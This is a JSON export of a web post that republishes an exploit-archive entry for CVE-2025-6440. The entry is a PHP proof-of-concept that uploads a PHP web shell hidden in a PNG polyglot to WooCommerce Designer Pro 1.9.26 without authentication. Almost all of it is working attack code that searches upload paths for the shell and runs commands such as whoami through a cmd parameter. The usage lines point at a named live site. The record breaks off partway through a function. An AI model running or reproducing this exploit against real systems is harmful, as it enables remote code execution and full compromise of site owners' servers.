{"id":39478,"date":"2026-02-06T13:53:23","date_gmt":"2026-02-06T13:53:23","guid":{"rendered":"http:\/\/localhost\/?p=39478"},"modified":"2026-02-06T13:53:23","modified_gmt":"2026-02-06T13:53:23","slug":"wordpress-woocommerce-designer-pro-1926-shell-upload","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=39478","title":{"rendered":"\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload_PACKETSTORM:215066"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-06T18:47:18&#8243;,&#8221;description&#8221;:&#8221;WordPress WOOCOMMERCE Designer Pro plugin version 1.9.26 proof of concept remote shell upload exploit&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-06T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WordPress WOOCOMMERCE Designer Pro 1.9.26 Shell Upload&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215066&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-6440&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : WordPress WOOCOMMERCE Designer Pro 1.9.26 Arbitrary File Upload                                                             |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/codecanyon.net\/item\/woocommerce-designer-pro-cmyk-card-flyer\/22027731                                               |\\n    =============================================================================================================================================\\n    \\n    [+] References :  https:\/\/packetstorm.news\/files\/id\/211066\/ \\u0026 \\tCVE-2025-6440\\n    \\n    [+] Summary    : An unauthenticated attacker may upload arbitrary files (including PHP web-shells) to reachable paths under \/wp-content\/uploads\/.\\n    \\n    Impact:\\n    &#8212;&#8212;-\\n    &#8211; Remote Code Execution (RCE) (if PHP is parsed)\\n    &#8211; Stored Payload\\n    &#8211; Full site compromise\\n    \\n    \\n    [+] php poc.php\\n    \\n    php exploit.php &#8211;url https:\/\/bezignprint.com &#8211;dirscan\\n    \\n    \\n    php exploit.php &#8211;url https:\/\/bezignprint.com &#8211;file webadmin.php &#8211;verbose\\n    \\n    \\n    php exploit.php &#8211;url https:\/\/bezignprint.com &#8211;verbose\\n    \\n    \\u003c?php\\n    \\n    class CVE_2025_6440_Exploit {\\n        private $base_url;\\n        private $verbose;\\n        private $user_agent = \\&#8221;Mozilla\/5.0\\&#8221;;\\n        \\n        public function __construct($url, $verbose = false) {\\n            $this-\\u003ebase_url = $this-\\u003enormalize_url($url);\\n            $this-\\u003everbose = $verbose;\\n        }\\n        \\n        private function normalize_url($url) {\\n            if (!preg_match(&#8216;\/^https?:\\\\\/\\\\\/\/&#8217;, $url)) {\\n                $url = \\&#8221;https:\/\/\\&#8221; . $url;\\n            }\\n            return rtrim($url, \\&#8221;\/\\&#8221;) . \\&#8221;\/\\&#8221;;\\n        }\\n        \\n        private function ajax_url() {\\n            return $this-\\u003ebase_url . \\&#8221;wp-admin\/admin-ajax.php\\&#8221;;\\n        }\\n        \\n        private function uploads_base() {\\n            return $this-\\u003ebase_url . \\&#8221;wp-content\/uploads\/\\&#8221;;\\n        }\\n        \\n        private function contains_php($bytes) {\\n            return strpos($bytes, &#8216;\\u003c?php&#8217;) !== false || strpos($bytes, &#8216;\\u003c?=&#8217;) !== false;\\n        }\\n        \\n        private function extract_php_from_bytes($bytes) {\\n            $idx = strpos($bytes, &#8216;\\u003c?php&#8217;);\\n            if ($idx === false) {\\n                $idx = strpos($bytes, &#8216;\\u003c?=&#8217;);\\n                if ($idx === false) {\\n                    return [-1, &#8221;];\\n                }\\n            }\\n            return [$idx, substr($bytes, $idx)];\\n        }\\n        \\n        private function upload_file($uniq, $file_bytes, $filename, $mime, $timeout = 30) {\\n            $target = $this-\\u003eajax_url();\\n            $action = \\&#8221;wcdp_save_canvas_design_ajax\\&#8221;;\\n            $field = \\&#8221;0\\&#8221;;\\n            \\n            $pathinfo = pathinfo($filename);\\n            $name = $pathinfo[&#8216;filename&#8217;];\\n            $ext = isset($pathinfo[&#8216;extension&#8217;]) ? $pathinfo[&#8216;extension&#8217;] : &#8221;;\\n            \\n            \/\/ \u0625\u0646\u0634\u0627\u0621 PNG polyglot \u0628\u062f\u0644\u0627\u064b \u0645\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0645\u0644\u0641 \u0645\u0628\u0627\u0634\u0631\u0629\\n            $png_header = \\&#8221;\\\\x89PNG\\\\r\\\\n\\\\x1a\\\\n\\&#8221;;\\n            $png_ihdr = pack(\\&#8221;N\\&#8221;, 13) . \\&#8221;IHDR\\&#8221; . pack(\\&#8221;NN\\&#8221;, 100, 100) . \\&#8221;\\\\x08\\\\x06\\\\x00\\\\x00\\\\x00\\&#8221;;\\n            $png_crc = pack(\\&#8221;N\\&#8221;, crc32(\\&#8221;IHDR\\&#8221; . substr($png_ihdr, 4, 13)));\\n            \\n            \/\/ \u0625\u0636\u0627\u0641\u0629 PHP \u0643\u0640comment \u0641\u064a PNG\\n            $php_comment = \\&#8221;\\u003c?php \/*\\&#8221; . str_repeat(\\&#8221; \\&#8221;, 50) . \\&#8221;*\/ ?\\u003e\\\\n\\&#8221; . $file_bytes;\\n            $text_chunk = \\&#8221;tEXt\\&#8221; . $php_comment;\\n            $text_length = strlen($php_comment);\\n            $text_crc = crc32(\\&#8221;tEXt\\&#8221; . $php_comment);\\n            \\n            \/\/ \u0628\u0646\u0627\u0621 PNG \u0643\u0627\u0645\u0644\\n            $png_data = $png_header . \\n                       $png_ihdr . $png_crc .\\n                       pack(\\&#8221;N\\&#8221;, $text_length) . $text_chunk . pack(\\&#8221;N\\&#8221;, $text_crc) .\\n                       \\&#8221;\\\\x00\\\\x00\\\\x00\\\\x00IEND\\\\xaeB`\\\\x82\\&#8221;;\\n            \\n            \/\/ \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0633\u0645 PNG\\n            $fake_name = \\&#8221;design_\\&#8221; . $uniq . \\&#8221;.png\\&#8221;;\\n            \\n            $params = [\\n                \\&#8221;mode\\&#8221; =\\u003e \\&#8221;addtocart\\&#8221;,\\n                \\&#8221;uniq\\&#8221; =\\u003e $uniq,\\n                \\&#8221;editor\\&#8221; =\\u003e \\&#8221;frontend\\&#8221;,\\n                \\&#8221;designID\\&#8221; =\\u003e rand(1, 1000),\\n                \\&#8221;productID\\&#8221; =\\u003e rand(1, 1000),\\n                \\&#8221;addCMYK\\&#8221; =\\u003e false,\\n                \\&#8221;saveList\\&#8221; =\\u003e false,\\n                \\&#8221;productData\\&#8221; =\\u003e 0,\\n                \\&#8221;files\\&#8221; =\\u003e [[\\n                    \\&#8221;count\\&#8221; =\\u003e $field,\\n                    \\&#8221;name\\&#8221; =\\u003e \\&#8221;design\\&#8221;,\\n                    \\&#8221;ext\\&#8221; =\\u003e \\&#8221;png\\&#8221;\\n                ]]\\n            ];\\n            \\n            $data = [\\n                \\&#8221;action\\&#8221; =\\u003e $action,\\n                \\&#8221;params\\&#8221; =\\u003e json_encode($params, JSON_UNESCAPED_SLASHES)\\n            ];\\n            \\n            if ($this-\\u003everbose) {\\n                echo \\&#8221;\\\\n[VERBOSE] Upload target: $target\\\\n\\&#8221;;\\n                echo \\&#8221;[VERBOSE] Data fields: \\&#8221; . json_encode($data, JSON_PRETTY_PRINT) . \\&#8221;\\\\n\\&#8221;;\\n                echo \\&#8221;[VERBOSE] File: $fake_name (\\&#8221; . strlen($png_data) . \\&#8221; bytes, image\/png)\\\\n\\&#8221;;\\n            }\\n            \\n            $ch = curl_init();\\n            \\n            \/\/ \u0628\u0646\u0627\u0621 multipart\\n            $boundary = &#8216;&#8212;-WebKitFormBoundary&#8217; . bin2hex(random_bytes(16));\\n            $body = &#8221;;\\n            \\n            \/\/ \u0625\u0636\u0627\u0641\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a\\n            foreach ($data as $key =\\u003e $value) {\\n                $body .= \\&#8221;&#8211;$boundary\\\\r\\\\n\\&#8221;;\\n                $body .= \\&#8221;Content-Disposition: form-data; name=\\\\\\&#8221;$key\\\\\\&#8221;\\\\r\\\\n\\\\r\\\\n\\&#8221;;\\n                $body .= \\&#8221;$value\\\\r\\\\n\\&#8221;;\\n            }\\n            \\n            \/\/ \u0625\u0636\u0627\u0641\u0629 \u0627\u0644\u0645\u0644\u0641\\n            $body .= \\&#8221;&#8211;$boundary\\\\r\\\\n\\&#8221;;\\n            $body .= \\&#8221;Content-Disposition: form-data; name=\\\\\\&#8221;$field\\\\\\&#8221;; filename=\\\\\\&#8221;$fake_name\\\\\\&#8221;\\\\r\\\\n\\&#8221;;\\n            $body .= \\&#8221;Content-Type: image\/png\\\\r\\\\n\\\\r\\\\n\\&#8221;;\\n            $body .= $png_data . \\&#8221;\\\\r\\\\n\\&#8221;;\\n            $body .= \\&#8221;&#8211;$boundary&#8211;\\\\r\\\\n\\&#8221;;\\n            \\n            $headers = [\\n                \\&#8221;Content-Type: multipart\/form-data; boundary=$boundary\\&#8221;,\\n                \\&#8221;Content-Length: \\&#8221; . strlen($body),\\n                \\&#8221;User-Agent: \\&#8221; . $this-\\u003euser_agent,\\n                \\&#8221;Accept: application\/json, *\/*;q=0.1\\&#8221;,\\n                \\&#8221;Accept-Language: en-US,en;q=0.9\\&#8221;,\\n                \\&#8221;Referer: \\&#8221; . $this-\\u003ebase_url,\\n                \\&#8221;X-Requested-With: XMLHttpRequest\\&#8221;,\\n                \\&#8221;Origin: \\&#8221; . rtrim($this-\\u003ebase_url, \\&#8221;\/\\&#8221;),\\n                \\&#8221;Connection: keep-alive\\&#8221;\\n            ];\\n            \\n            curl_setopt_array($ch, [\\n                CURLOPT_URL =\\u003e $target,\\n                CURLOPT_POST =\\u003e true,\\n                CURLOPT_POSTFIELDS =\\u003e $body,\\n                CURLOPT_HTTPHEADER =\\u003e $headers,\\n                CURLOPT_RETURNTRANSFER =\\u003e true,\\n                CURLOPT_TIMEOUT =\\u003e $timeout,\\n                CURLOPT_FOLLOWLOCATION =\\u003e true,\\n                CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n                CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n                CURLOPT_ENCODING =\\u003e &#8216;gzip, deflate&#8217;,\\n                CURLOPT_HEADER =\\u003e true,\\n                CURLOPT_HTTP_VERSION =\\u003e CURL_HTTP_VERSION_1_1\\n            ]);\\n            \\n            $response = curl_exec($ch);\\n            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n            $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);\\n            $response_headers = substr($response, 0, $header_size);\\n            $response_body = substr($response, $header_size);\\n            \\n            if ($this-\\u003everbose) {\\n                echo \\&#8221;[VERBOSE] HTTP Response: $http_code\\\\n\\&#8221;;\\n                if (strlen($response_body) \\u003c 1000) {\\n                    echo \\&#8221;[VERBOSE] Response body: $response_body\\\\n\\&#8221;;\\n                }\\n            }\\n            \\n            if (curl_errno($ch)) {\\n                echo \\&#8221;[!] Upload request failed: \\&#8221; . curl_error($ch) . \\&#8221;\\\\n\\&#8221;;\\n                curl_close($ch);\\n                return null;\\n            }\\n            \\n            curl_close($ch);\\n            \\n            return [\\n                &#8216;status_code&#8217; =\\u003e $http_code,\\n                &#8216;body&#8217; =\\u003e $response_body,\\n                &#8216;text&#8217; =\\u003e $response_body,\\n                &#8216;headers&#8217; =\\u003e $response_headers\\n            ];\\n        }\\n        \\n        private function check_remote($public_url, $save_copy = null, $timeout = 15) {\\n            $ch = curl_init();\\n            curl_setopt_array($ch, [\\n                CURLOPT_URL =\\u003e $public_url,\\n                CURLOPT_RETURNTRANSFER =\\u003e true,\\n                CURLOPT_TIMEOUT =\\u003e $timeout,\\n                CURLOPT_FOLLOWLOCATION =\\u003e true,\\n                CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n                CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n                CURLOPT_HEADER =\\u003e true,\\n                CURLOPT_USERAGENT =\\u003e $this-\\u003euser_agent,\\n                CURLOPT_ENCODING =\\u003e &#8216;gzip, deflate&#8217;,\\n                CURLOPT_HTTP_VERSION =\\u003e CURL_HTTP_VERSION_1_1\\n            ]);\\n            \\n            $response = curl_exec($ch);\\n            \\n            if (curl_errno($ch)) {\\n                echo \\&#8221;[!] Remote GET failed: \\&#8221; . curl_error($ch) . \\&#8221;\\\\n\\&#8221;;\\n                curl_close($ch);\\n                return null;\\n            }\\n            \\n            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n            $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);\\n            $headers = substr($response, 0, $header_size);\\n            $body = substr($response, $header_size);\\n            \\n            curl_close($ch);\\n            \\n            $content_type = &#8221;;\\n            if (preg_match(&#8216;\/Content-Type:\\\\s*([^\\\\r\\\\n]+)\/i&#8217;, $headers, $matches)) {\\n                $content_type = trim($matches[1]);\\n            }\\n            \\n            $info = [\\n                \\&#8221;status_code\\&#8221; =\\u003e $http_code,\\n                \\&#8221;content_type\\&#8221; =\\u003e $content_type,\\n                \\&#8221;body_bytes\\&#8221; =\\u003e $body,\\n                \\&#8221;headers\\&#8221; =\\u003e $headers\\n            ];\\n            \\n            if ($save_copy) {\\n                try {\\n                    file_put_contents($save_copy, $body);\\n                    if ($this-\\u003everbose) {\\n                        echo \\&#8221;[VERBOSE] Saved remote copy to $save_copy\\\\n\\&#8221;;\\n                    }\\n                } catch (Exception $e) {\\n                    echo \\&#8221;[!] Could not write save_copy: \\&#8221; . $e-\\u003egetMessage() . \\&#8221;\\\\n\\&#8221;;\\n                }\\n            }\\n            \\n            return $info;\\n        }\\n        \\n        public function exploit($payload_file) {\\n            if (!file_exists($payload_file)) {\\n                echo \\&#8221;[!] File not found: $payload_file\\\\n\\&#8221;;\\n                return false;\\n            }\\n            \\n            $file_bytes = file_get_contents($payload_file);\\n            $filename = basename($payload_file);\\n            $uniq = bin2hex(random_bytes(6));\\n            \\n            echo \\&#8221;[*] Target: \\&#8221; . $this-\\u003ebase_url . \\&#8221;\\\\n\\&#8221;;\\n            echo \\&#8221;[*] Uniq ID: $uniq\\\\n\\&#8221;;\\n            echo \\&#8221;[*] Payload: $payload_file\\\\n\\&#8221;;\\n            \\n            \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0644\u0631\u0641\u0639\\n            $resp = $this-\\u003eupload_file($uniq, $file_bytes, $filename, &#8216;image\/png&#8217;);\\n            \\n            if ($resp === null) {\\n                echo \\&#8221;[!] Upload request failed\\\\n\\&#8221;;\\n                return false;\\n            }\\n            \\n            echo \\&#8221;[*] Upload response: HTTP {$resp[&#8216;status_code&#8217;]}\\\\n\\&#8221;;\\n            \\n            \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0633\u062a\u062e\u0631\u0627\u062c URL \u0645\u0646 JSON\\n            $public_url = null;\\n            \\n            if ($resp[&#8216;status_code&#8217;] == 200 \\u0026\\u0026 !empty($resp[&#8216;body&#8217;])) {\\n                if ($this-\\u003everbose) {\\n                    echo \\&#8221;[VERBOSE] Raw response: \\&#8221; . substr($resp[&#8216;body&#8217;], 0, 500) . \\&#8221;\\\\n\\&#8221;;\\n                }\\n                \\n                $json = json_decode($resp[&#8216;body&#8217;], true);\\n                if ($json \\u0026\\u0026 is_array($json)) {\\n                    if ($this-\\u003everbose) {\\n                        echo \\&#8221;[VERBOSE] JSON Response: \\&#8221; . json_encode($json, JSON_PRETTY_PRINT) . \\&#8221;\\\\n\\&#8221;;\\n                    }\\n                    \\n                    \/\/ \u0627\u0644\u0628\u062d\u062b \u0639\u0646 URL \u0641\u064a \u0627\u0644\u0640JSON\\n                    array_walk_recursive($json, function($value, $key) use (\\u0026$public_url) {\\n                        if (is_string($value) \\u0026\\u0026 \\n                            (strpos($value, &#8216;\/wp-content\/&#8217;) !== false || \\n                             strpos($value, &#8216;wcdp-uploads&#8217;) !== false ||\\n                             preg_match(&#8216;\/\\\\.(php|png|jpg|jpeg|gif)$\/i&#8217;, $value))) {\\n                            $public_url = $value;\\n                        }\\n                    });\\n                    \\n                    if ($public_url) {\\n                        echo \\&#8221;[*] Found URL in JSON response\\\\n\\&#8221;;\\n                    }\\n                }\\n                \\n                \/\/ \u0625\u0630\u0627 \u0644\u0645 \u0646\u062c\u062f \u0641\u064a JSON\u060c \u062d\u0627\u0648\u0644 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0645\u0646 \u0627\u0644\u0646\u0635 \u0627\u0644\u062e\u0627\u0645\\n                if (!$public_url \\u0026\\u0026 preg_match(&#8216;\/\\&#8221;([^\\&#8221;]+\\\\.(png|jpg|jpeg|gif|php))\\&#8221;\/i&#8217;, $resp[&#8216;body&#8217;], $matches)) {\\n                    $public_url = $matches[1];\\n                    echo \\&#8221;[*] Found URL in response text\\\\n\\&#8221;;\\n                }\\n            }\\n            \\n            \/\/ \u0625\u0630\u0627 \u0644\u0645 \u0646\u062c\u062f URL\u060c \u0646\u0633\u062a\u062e\u062f\u0645 \u0627\u0644\u0645\u0633\u0627\u0631 \u0627\u0644\u0627\u0641\u062a\u0631\u0627\u0636\u064a \u0645\u0639 \u0627\u0644\u062a\u0635\u062d\u064a\u062d\\n            if (!$public_url) {\\n                \/\/ \u062d\u0633\u0628 \u0627\u0644\u0645\u0648\u0642\u0639\u060c \u0627\u0644\u0645\u0633\u0627\u0631 \u0642\u062f \u064a\u0643\u0648\u0646 \u0645\u062e\u062a\u0644\u0641\u0627\u064b\\n                $public_url = $this-\\u003ebase_url . \\&#8221;wp-content\/uploads\/wcdp-uploads\/temp\/$uniq\/design.png\\&#8221;;\\n                echo \\&#8221;[*] Using default URL pattern\\\\n\\&#8221;;\\n            } else {\\n                \/\/ \u0627\u0644\u062a\u0623\u0643\u062f \u0623\u0646 \u0627\u0644\u0640URL \u0643\u0627\u0645\u0644\\n                if (!preg_match(&#8216;\/^https?:\\\\\/\\\\\/\/&#8217;, $public_url)) {\\n                    $public_url = $this-\\u003ebase_url . ltrim($public_url, \\&#8221;\/\\&#8221;);\\n                }\\n            }\\n            \\n            echo \\&#8221;[*] Trying to access: $public_url\\\\n\\&#8221;;\\n            \\n            \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 URL \u0645\u0628\u0627\u0634\u0631\u0629\\n            $info = $this-\\u003echeck_remote($public_url, \\&#8221;downloaded_{$uniq}.bin\\&#8221;);\\n            \\n            if (!$info) {\\n                echo \\&#8221;[!] Could not fetch remote file\\\\n\\&#8221;;\\n                \\n                \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0645\u0633\u0627\u0631\u0627\u062a \u0628\u062f\u064a\u0644\u0629 \u0628\u0646\u0627\u0621\u064b \u0639\u0644\u0649 \u0647\u064a\u0643\u0644 \u0627\u0644\u0645\u0648\u0642\u0639\\n                $alt_paths = [\\n                    \/\/ \u0627\u0644\u0645\u0633\u0627\u0631 \u0627\u0644\u0630\u064a \u0648\u062c\u062f\u062a\u0647 \u0641\u064a \u0627\u0644\u0645\u0648\u0642\u0639\\n                    $this-\\u003ebase_url . \\&#8221;wp-content\/uploads\/wcdp-uploads\/\\&#8221;,\\n                    $this-\\u003ebase_url . \\&#8221;wp-content\/uploads\/wcdp-uploads\/temp\/$uniq\/\\&#8221;,\\n                    $this-\\u003ebase_url . \\&#8221;wp-content\/uploads\/wcdp-uploads\/$uniq\/\\&#8221;,\\n                    $this-\\u003ebase_url . \\&#8221;wp-content\/uploads\/wcdp-uploads\/design_$uniq.png\\&#8221;,\\n                    $this-\\u003ebase_url . \\&#8221;wp-content\/uploads\/wcdp-uploads\/temp\/$uniq\/design_$uniq.png\\&#8221;,\\n                    \/\/ \u0645\u0633\u0627\u0631\u0627\u062a \u0639\u0627\u0645\u0629\\n                    $this-\\u003ebase_url . \\&#8221;wp-content\/uploads\/wcdp-uploads\/temp\/design.png\\&#8221;,\\n                    $this-\\u003ebase_url . \\&#8221;wp-content\/uploads\/wcdp-uploads\/design.png\\&#8221;\\n                ];\\n                \\n                foreach ($alt_paths as $alt_path) {\\n                    echo \\&#8221;[*] Trying alternative path: $alt_path\\\\n\\&#8221;;\\n                    $info = $this-\\u003echeck_remote($alt_path, \\&#8221;downloaded_{$uniq}_alt.bin\\&#8221;);\\n                    if ($info \\u0026\\u0026 $info[&#8216;status_code&#8217;] == 200) {\\n                        $public_url = $alt_path;\\n                        break;\\n                    }\\n                    \\n                    \/\/ \u0625\u0630\u0627 \u0643\u0627\u0646 \u062f\u0644\u064a\u0644\u060c \u062d\u0627\u0648\u0644 \u0625\u062f\u0631\u0627\u062c \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0641\u064a\u0647\\n                    if (substr($alt_path, -1) == &#8216;\/&#8217;) {\\n                        $possible_files = [\\&#8221;design.png\\&#8221;, \\&#8221;image.png\\&#8221;, \\&#8221;file.png\\&#8221;, \\&#8221;design_$uniq.png\\&#8221;];\\n                        foreach ($possible_files as $file) {\\n                            $file_path = $alt_path . $file;\\n                            echo \\&#8221;[*]   Trying file: $file_path\\\\n\\&#8221;;\\n                            $file_info = $this-\\u003echeck_remote($file_path, null);\\n                            if ($file_info \\u0026\\u0026 $file_info[&#8216;status_code&#8217;] == 200) {\\n                                $info = $file_info;\\n                                $public_url = $file_path;\\n                                break 2;\\n                            }\\n                        }\\n                    }\\n                }\\n            }\\n            \\n            if (!$info) {\\n                echo \\&#8221;[!] Failed to locate uploaded file\\\\n\\&#8221;;\\n                \\n                \/\/ \u0639\u0631\u0636 \u0627\u0644\u0645\u0633\u0627\u0631\u0627\u062a \u0627\u0644\u0645\u062a\u0627\u062d\u0629\\n                echo \\&#8221;\\\\n[*] Available paths to check manually:\\\\n\\&#8221;;\\n                echo \\&#8221;1. \\&#8221; . $this-\\u003ebase_url . \\&#8221;wp-content\/uploads\/wcdp-uploads\/\\\\n\\&#8221;;\\n                echo \\&#8221;2. \\&#8221; . $this-\\u003ebase_url . \\&#8221;wp-content\/uploads\/wcdp-uploads\/temp\/\\\\n\\&#8221;;\\n                echo \\&#8221;3. \\&#8221; . $this-\\u003ebase_url . \\&#8221;wp-content\/uploads\/wcdp-uploads\/temp\/$uniq\/\\\\n\\&#8221;;\\n                echo \\&#8221;\\\\n[*] Try browsing these paths in browser\\\\n\\&#8221;;\\n                \\n                return false;\\n            }\\n            \\n            echo \\&#8221;[*] Remote status: {$info[&#8216;status_code&#8217;]}\\\\n\\&#8221;;\\n            echo \\&#8221;[*] Content-Type: {$info[&#8216;content_type&#8217;]}\\\\n\\&#8221;;\\n            \\n            if ($info[&#8216;status_code&#8217;] == 200) {\\n                $body = $info[&#8216;body_bytes&#8217;];\\n                \\n                if ($this-\\u003econtains_php($body)) {\\n                    echo \\&#8221;[+] SUCCESS: File contains PHP code!\\\\n\\&#8221;;\\n                    \\n                    \/\/ \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0627\u0644\u0643\u0648\u062f\\n                    list($idx, $extracted) = $this-\\u003eextract_php_from_bytes($body);\\n                    if ($idx \\u003e= 0) {\\n                        $outname = \\&#8221;shell_{$uniq}.php\\&#8221;;\\n                        file_put_contents($outname, $extracted);\\n                        echo \\&#8221;[+] Shell extracted to: $outname\\\\n\\&#8221;;\\n                        \\n                        \/\/ \u062d\u0641\u0638 \u0643\u0627\u0645\u0644 \u0627\u0644\u0645\u0644\u0641 \u0623\u064a\u0636\u0627\u064b\\n                        $fullname = \\&#8221;full_{$uniq}.bin\\&#8221;;\\n                        file_put_contents($fullname, $body);\\n                        echo \\&#8221;[+] Full file saved as: $fullname\\\\n\\&#8221;;\\n                        \\n                        \/\/ \u0639\u0631\u0636 \u062c\u0632\u0621 \u0645\u0646 \u0627\u0644\u0645\u062d\u062a\u0648\u0649\\n                        $sample = substr($extracted, 0, 300);\\n                        echo \\&#8221;[+] Code sample:\\\\n\\&#8221; . htmlspecialchars($sample) . \\&#8221;&#8230;\\\\n\\&#8221;;\\n                    }\\n                    \\n                    echo \\&#8221;\\\\n[+] SHELL URL: $public_url\\\\n\\&#8221;;\\n                    echo \\&#8221;[+] Access it directly in browser or with curl:\\\\n\\&#8221;;\\n                    echo \\&#8221;    curl -k \\\\\\&#8221;$public_url\\\\\\&#8221;\\\\n\\&#8221;;\\n                    echo \\&#8221;    curl -k \\\\\\&#8221;$public_url?cmd=id\\\\\\&#8221;\\\\n\\&#8221;;\\n                    \\n                    \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u0645\u0628\u0627\u0634\u0631 \u0644\u0644\u0640shell\\n                    $this-\\u003etest_shell($public_url);\\n                } else {\\n                    echo \\&#8221;[-] File does not contain PHP code\\\\n\\&#8221;;\\n                    \\n                    \/\/ \u0641\u062d\u0635 \u0625\u0630\u0627 \u0643\u0627\u0646 PNG \u0645\u062e\u0641\u064a\\n                    $magic = substr($body, 0, 8);\\n                    if ($magic === \\&#8221;\\\\x89PNG\\\\r\\\\n\\\\x1a\\\\n\\&#8221;) {\\n                        echo \\&#8221;[*] File is a valid PNG (might be polyglot)\\\\n\\&#8221;;\\n                        \\n                        \/\/ \u0627\u0644\u0628\u062d\u062b \u0639\u0646 PHP \u062f\u0627\u062e\u0644 PNG\\n                        if (($pos = strpos($body, &#8216;\\u003c?php&#8217;)) !== false) {\\n                            echo \\&#8221;[+] Found PHP inside PNG at position: $pos\\\\n\\&#8221;;\\n                            $extracted = substr($body, $pos);\\n                            $outname = \\&#8221;extracted_png_{$uniq}.php\\&#8221;;\\n                            file_put_contents($outname, $extracted);\\n                            echo \\&#8221;[+] Extracted to: $outname\\\\n\\&#8221;;\\n                            \\n                            \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u0627\u0644\u0640shell \u0627\u0644\u0645\u0633\u062a\u062e\u0631\u062c\\n                            $this-\\u003etest_shell($this-\\u003ebase_url . \\&#8221;wp-content\/uploads\/wcdp-uploads\/temp\/$uniq\/\\&#8221; . basename($outname));\\n                        }\\n                    }\\n                    \\n                    \/\/ \u0639\u0631\u0636 \u0623\u0648\u0644 500 \u0628\u0627\u064a\u062a \u0644\u0644\u0645\u062d\u062a\u0648\u0649 \u0644\u0644\u0641\u062d\u0635\\n                    echo \\&#8221;[*] First 500 bytes of response:\\\\n\\&#8221;;\\n                    echo htmlspecialchars(substr($body, 0, 500)) . \\&#8221;\\\\n\\&#8221;;\\n                }\\n            } else {\\n                echo \\&#8221;[-] File not accessible (Status: {$info[&#8216;status_code&#8217;]})\\\\n\\&#8221;;\\n            }\\n            \\n            return true;\\n        }\\n        \\n        private function test_shell($url) {\\n            echo \\&#8221;\\\\n[*] Testing shell functionality&#8230;\\\\n\\&#8221;;\\n            \\n            \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u0628\u0633\u064a\u0637\\n            $ch = curl_init($url . \\&#8221;?cmd=echo%20test123\\&#8221;);\\n            curl_setopt_array($ch, [\\n                CURLOPT_RETURNTRANSFER =\\u003e true,\\n                CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n                CURLOPT_TIMEOUT =\\u003e 10,\\n                CURLOPT_FOLLOWLOCATION =\\u003e true,\\n                CURLOPT_USERAGENT =\\u003e $this-\\u003euser_agent\\n            ]);\\n            \\n            $response = curl_exec($ch);\\n            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n            \\n            if ($http_code == 200) {\\n                if (strpos($response, \\&#8221;test123\\&#8221;) !== false) {\\n                    echo \\&#8221;[+] Shell is active and working!\\\\n\\&#8221;;\\n                    \\n                    \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u0625\u0636\u0627\u0641\u064a\\n                    curl_setopt($ch, CURLOPT_URL, $url . \\&#8221;?cmd=whoami\\&#8221;);\\n                    $whoami = curl_exec($ch);\\n                    echo \\&#8221;[+] Current user: \\&#8221; . trim($whoami) . \\&#8221;\\\\n\\&#8221;;\\n                    \\n                    curl_setopt($ch, CURLOPT_URL, $url . \\&#8221;?cmd=pwd\\&#8221;);\\n                    $pwd = curl_exec($ch);\\n                    echo \\&#8221;[+] Current directory: \\&#8221; . trim($pwd) . \\&#8221;\\\\n\\&#8221;;\\n                } else {\\n                    echo \\&#8221;[?] Shell accessible but command execution may be filtered\\\\n\\&#8221;;\\n                    echo \\&#8221;[?] Response: \\&#8221; . substr($response, 0, 200) . \\&#8221;\\\\n\\&#8221;;\\n                }\\n            } else {\\n                echo \\&#8221;[-] Shell not responding (HTTP $http_code)\\\\n\\&#8221;;\\n            }\\n            \\n            curl_close($ch);\\n        }\\n        \\n        public static function print_banner() {\\n            echo \\&#8221;\\\\n\\\\033[32;1m\\&#8221; . str_repeat(\\&#8221;=\\&#8221;, 60) . \\&#8221;\\\\033[0m\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\033[32;1m\\&#8221; . \\&#8221;   CVE-2025-6440 &#8211; WordPress Design Plugin RCE\\&#8221; . \\&#8221;\\\\033[0m\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\033[32;1m\\&#8221; . \\&#8221;   Advanced Bypass with PNG Polyglot\\&#8221; . \\&#8221;\\\\033[0m\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\033[32;1m\\&#8221; . str_repeat(\\&#8221;=\\&#8221;, 60) . \\&#8221;\\\\033[0m\\\\n\\\\n\\&#8221;;\\n        }\\n        \\n        public function directory_scan() 